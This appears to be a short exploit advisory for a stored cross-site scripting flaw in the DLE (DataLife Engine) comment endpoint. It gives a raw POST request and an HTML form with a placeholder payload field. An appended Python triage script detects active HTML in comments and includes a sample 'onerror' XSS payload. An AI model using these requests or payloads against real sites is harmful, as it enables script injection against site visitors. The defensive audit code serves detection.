DLE Stored XSS Injection



402 views | 1 minute, 7 seconds | 2019-12-20 | alicangonullu



DLE Stored XSS Injection
# Exploit Author : Ali Can Gönüllü
# Exploit Date : 16-12-2019
# Source : https://github.com/Resert/dle
# Exploit :
POST https://xss.com/engine/ajax/addcomments.php
Host: xss.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1469
Origin: https://www.xss.org
Connection: keep-alive
Cookie: PHPSESSID=mhumqqrv70ju2hmpfr0qdflkb1

post_id=id&comments=xss_code&name=name&mail=mail@mail.com&editor_mode=&skin=Red&sec_code=editting_plz&question_answer=&g_recaptcha_response=&allow_subscribe=0

<form action="https://xss.org/engine/ajax/addcomments.php" method="post">
<input type="text" name="post_id" value="id"><br>
<input type="text" name="comments" value="comment"><br>
<input type="hidden" name="editor_mode" value=""><br>
<input type="hidden" name="skin" value="Red"><br>
<input type="text" name="sec_code" value="edit"><br>
<input type="text" name="question_answer" value="edit"><br>
<input type="submit" value="Submit">
</form>
The injected code is then shown at, for example: quote.php?id=id
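
A triage sketch for site owners, added here and not part of the original advisory or of DLE's code: it decodes request bodies of the shape shown above, flags `comments` values that carry active HTML, and returns the HTML-encoded form a template should emit. The tag allow-list, the function names and the two sample bodies are assumptions constructed for this example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Tags tolerated in a rendered comment: an assumption for this example.
ALLOWED_TAGS = {"b", "i", "u", "br", "blockquote"}


class CommentAudit(HTMLParser):
    """Collects markup in a comment that a browser would treat as active."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):  # inline event handler
                self.findings.append(f"handler:{name}")
            elif value and value.strip().lower().startswith(("javascript:", "data:")):
                self.findings.append(f"uri:{name}")


def audit_comment(text):
    parser = CommentAudit()
    parser.feed(text)
    parser.close()
    return parser.findings


def audit_request_body(body):
    """Decode a urlencoded addcomments.php body and audit its comments field."""
    fields = parse_qs(body, keep_blank_values=True)
    comment = fields.get("comments", [""])[0]
    return {
        "post_id": fields.get("post_id", [""])[0],
        "findings": audit_comment(comment),
        # What a template should emit so the browser shows text, not markup.
        "encoded": escape(comment, quote=True),
    }


# Constructed sample bodies using the field names from the request above.
BENIGN = "post_id=12&comments=nice+post&name=a&mail=a%40example.com&skin=Red"
MARKUP = "post_id=12&comments=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&name=a&skin=Red"

if __name__ == "__main__":
    for body in (BENIGN, MARKUP):
        print(audit_request_body(body))
```

The same `audit_comment` check can be run over comment rows already stored in the database to find entries submitted before output encoding was fixed.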



© Copyright 2020 Ali Can Gönüllü | Legal